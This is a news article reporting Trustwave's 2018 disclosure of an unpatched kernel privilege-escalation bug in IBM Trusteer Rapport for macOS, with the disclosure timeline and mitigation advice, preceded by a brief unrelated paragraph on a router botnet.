Home routers and modems continue to be a major security risk for consumers and remote workers, and a threat to organizations. Just last month researchers uncovered a new botnet of 100,000 compromised machines, comprised mainly of UPnP-enabled home routers.


IBM Kernel-Based Vulnerability Discovered

Info Security - Fri, 12/21/2018 - 18:29

Researchers have discovered a kernel-based vulnerability in a driver bundled with IBM Trusteer Rapport for MacOS, according to a recently published advisory from Trustwave. If exploited, the vulnerability could elevate privileges on the local machine, allowing an attacker to subvert or disable Trusteer altogether.

According to Trustwave, its researchers worked with IBM throughout the disclosure process. When IBM was unable to provide a patch during the 90-day disclosure policy, Trustwave reportedly extended it an additional 30 days.

“Unfortunately, that was also not enough time to develop a patch, and we feel it's important to alert the public about this issue,” Trustwave’s Neil Kettle wrote in a blog post.

The Trustwave SpiderLabs Security Advisory TWSL2018-012 stated: “IBM Trusteer Rapport is an advanced endpoint protection solution designed to protect users from financial malware and phishing attacks. Using industry-leading technology, Trusteer Rapport is designed to defend against MitB attacks, remove malware from endpoint devices and protect customers by preventing them from entering phishing sites. Trusteer Rapport offers a broad security solution that can help your organization reduce costs, enhance your fraud detection and prevention, and help to provide a seamless customer experience.”

The vulnerability, which is caused by a signedness bug, was initially reported to the vendor on August 15, 2018. The 90-day deadline was extended on November 14, but on December 17 IBM confirmed that no patch was available, at which point Trustwave published the vulnerability advisory.

In lieu of a patch, Kettle wrote that “the risk of this vulnerability is slightly mitigated by requiring local access, so those affected are recommended to verify that only authorized users can log in to those systems.”

In addition, he wrote, “security awareness training can also help prevent local malware or social engineering attacks. Finally, you may want to step up auditing of any affected systems for signs of infection.”
